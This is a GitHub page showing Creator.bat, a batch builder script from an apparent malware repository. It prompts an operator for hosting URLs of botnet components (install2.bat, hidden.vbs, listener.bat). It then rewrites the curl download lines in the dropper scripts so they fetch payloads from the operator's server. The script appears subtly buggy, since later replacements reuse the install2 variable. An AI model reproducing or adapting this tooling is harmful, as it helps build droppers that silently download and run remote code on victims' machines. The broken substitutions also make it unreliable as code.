-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCreator.bat
13 lines (10 loc) · 1.15 KB
/
Creator.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
@echo on
echo Whats the install2.bat link? (e.g: https://legitsite.gg/botnet/install2.bat. Give full link with http/s too if you want that works)
set/p install2=
powershell -Command "(gc .\install.bat) -replace 'curl -O install2.bat https://raw.githubusercontent.com/AuchenDevs/Wanchun-Malware/main/install2.bat .*', 'curl -O install2.bat %install2% -s' | Out-File -encoding ASCII .\install.bat
echo Whats the hiddeen.vbs link? (e.g: https://legitsite.gg/botnet/hidden.vbs. Give full link with http/s too if you want that works)
set/p hidden=
powershell -Command "(gc .\install2.bat) -replace 'curl -O hidden.vbs https://raw.githubusercontent.com/AuchenDevs/Wanchun-Malware/main/hidden.vbs .*', 'curl -O hidden.vbs %install2% -s' | Out-File -encoding ASCII .\install2.bat
echo Whats the listener.bat link? (e.g: https://legitsite.gg/botnet/listener.bat. Give full link with http/s too if you want that works)
set/p listener=
powershell -Command "(gc .\install2.bat) -replace 'curl -O listener.vbs https://raw.githubusercontent.com/AuchenDevs/Wanchun-Malware/main/listener.bat .*', 'curl -O listener.bat %install2% -s' | Out-File -encoding ASCII .\install2.bat